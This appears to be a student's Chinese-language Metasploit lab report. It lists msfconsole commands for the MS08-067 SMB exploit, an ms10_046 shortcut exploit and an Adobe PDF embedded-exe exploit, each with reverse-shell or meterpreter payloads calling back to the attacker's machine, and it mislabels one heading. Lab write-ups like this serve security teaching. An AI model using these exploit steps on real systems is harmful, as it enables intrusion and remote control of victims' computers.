MS08_067漏洞渗透攻击（主动攻击）

这个实验使用winXPenSP3为靶机，并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。

1.打开终端，输入msfconsole

2.输入命令use exploit/windows/smb/ms08_067_netapi，使用MS08_067漏洞模块；

3.使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷；

4.设置具体参数：

set LHOST Kali的IP set RHOST Windows的IP；

5.输入show options查看所有参数是否设置正确

6.最后发起攻击输入exploit

MS11050安全漏洞（IE浏览器渗透攻击）

使用免考xp sp3为靶机；

首先得确保两台机子在同一网段内，如果不在就手动修改；

和上一步一样，首先终端中打开msfconsole

利用指令search ms10_046找到可以攻击的模块

输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

使用 set payload windows/meterpreter/reverse_tcp设置payload，并使用show options查看参数：

最后下令发起攻击exploit

复制local IP，在靶机上使用IE浏览器进行访问：

此时返回kali

使用 sessions -i 1 选择会话1，成功获取了靶机的shell，利用 systeminfo 指令查看靶机的系统信息：

对Adobe的漏洞攻击

输入search adobe查询和adobe漏洞有关的模块

将exploit/windows/fileformat/adobe_pdf_embedded_exe作为选择，然后show payloads查看payload：

输入命令use exploit/windows/fileformat/adobe_pdf_embedded_exe

选择windows/meterpreter/reverse_tcp 作为攻击载荷并输入命令 set windows/meterpreter/reverse_tcp

接着继续查看参数

输入set LHOST Kali的IP，接着exploit进行攻击

会生成一个pdf文件，我们需要找到它并将文件拷贝至windows XP下。

这个pdf文件是在隐藏文件夹中，所以我们需要在文件夹选项中选中查看隐藏文件。

输入命令进行监听回连

辅助模块的应用

输入命令show auxiliary查看辅助模块

在这里我使用scanner/http/options

接着输入命令use scanner/http/options之后输入info查看信息

设置完参数后执行

基础问题回答

用自己的话解释什么是exploit,payload,encode：

exploit:攻击手段，是能使攻击武器（payload）的方法；

payload:攻击武器，真正具有攻击性的代码；

encode:编码方式，根据payload将要被放置的环境选择合适的编码方式，使它能够正常的运行，如：消除所有的“0x00”；

实验体会

这个实验让我知道了平时杀毒软件提示有高危漏洞，这些漏洞是如何被别人利用从而达到攻击你电脑的目的的，但是只能通过特定的漏洞攻击特定的电脑，不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是，做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用，最后又莫名能连上了。。。